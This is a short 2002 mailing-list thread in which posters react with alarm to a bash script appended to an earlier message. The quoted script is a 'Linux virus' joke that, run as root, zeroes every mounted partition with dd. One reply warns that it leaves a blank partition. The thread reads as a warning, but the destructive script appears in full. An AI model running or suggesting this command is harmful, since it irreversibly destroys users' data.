yikes

On Mon, 11 Feb 2002, Scott Holder wrote:

> I believe, if you ran that as root, you'd find a blank partition once you
> rebooted.
>
> Scott Holder
>
> At 12:41 AM 2/11/2002 -0500, you wrote:
> >What the hell is that sh*t at the end of the message that you sent?
> >On Sun,
> >10 Feb 2002, Eric Laberge wrote:
> >
> > > #!/bin/bash
> > > if [ $UID -ne 0 ]
> > > then
> > >  echo "Linux virus, please run as root"
> > > else
> > >  for partition in $(df | cut -d ' ' -f 1 | grep /dev)
> > >  do
> > >   dd if=/dev/zero of=$partition
> > >  done
> > > fi
>
>
>


Reply via email to